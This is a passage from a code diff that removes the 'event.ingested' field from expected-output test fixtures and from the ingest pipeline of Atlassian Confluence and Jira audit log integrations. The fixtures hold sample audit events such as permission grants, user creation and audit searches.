added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":493000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3726,7 +3686,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347883766Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":496000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3816,7 +3775,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347884554Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":498000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3912,7 +3870,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347885273Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":501000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4008,7 +3965,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347885993Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":503000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4098,7 +4054,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347886696Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEATTACHMENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":506000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4194,7 +4149,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347887407Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":508000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4290,7 +4244,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347888116Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":510000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4380,7 +4333,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347888900Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EDITBLOG\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":513000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4476,7 +4428,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347889612Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":515000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4572,7 +4523,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347890335Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":518000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4662,7 +4612,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347891134Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"EXPORTSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":520000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4758,7 +4707,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347891855Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":522000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4854,7 +4802,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347892641Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":525000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -4944,7 +4891,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347893361Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEMAIL\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5040,7 +4986,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347894083Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":529000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5136,7 +5081,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:47:21.347894792Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":532000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5191,7 +5135,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:47:21.347895497Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log configuration updated\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"atlassian.audit.event.change.retention\",\"key\":\"Retention\",\"to\":\"3 Years\"}],\"extraAttributes\":[],\"method\":\"System\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":615000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5278,7 +5221,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347896285Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"57\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 57\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:43:22.615Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624653,\"nano\":873000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5360,7 +5302,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347897Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:44:13.873Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 58\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-22T23:47:20.782708Z;\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"58\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624840,\"nano\":815000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -5433,7 +5374,6 @@ }, "event": { "action": "audit.logging.summary.global.settings.edited", - "ingested": "2021-12-24T00:47:21.347897716Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Global settings changed\",\"actionI18nKey\":\"audit.logging.summary.global.settings.edited\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global Administration\",\"categoryI18nKey\":\"audit.logging.category.admin\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Custom contact admin message\",\"key\":\"Custom contact admin message\",\"to\":\"Please enter information about your request for the site administrators. If you are reporting an error please be sure you include information on what you were doing and the time the problem occurred.\"},{\"from\":\"Confluence\",\"i18nKey\":\"Site title\",\"key\":\"Site title\",\"to\":\"Confluence Test\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624990,\"nano\":382000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5531,7 +5471,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:47:21.347898426Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"Another User\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"Another User\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"another.user@example.como\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"another.user\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":842000000},\"version\":\"1.0\"}", "type": [ "user", @@ -5621,7 +5560,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347899141Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625013,\"nano\":966000000},\"version\":\"1.0\"}", "type": [ "group", @@ -5710,7 +5648,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:47:21.347899946Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a0e9dda0001\",\"name\":\"another.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625032,\"nano\":205000000},\"version\":\"1.0\"}", "type": [ "group", @@ -5805,7 +5742,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:47:21.347900660Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"63\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 63\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T23:42:45.791Z - 2021-11-22T23:50:32.205Z\"}],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637625035,\"nano\":770000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 2d64b9a828b..80aa4d2989d 100644 --- a/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_confluence/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index a683390cf18..2fe8055d2d6 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -37,7 +37,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:01.924698307Z", "original": "{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search 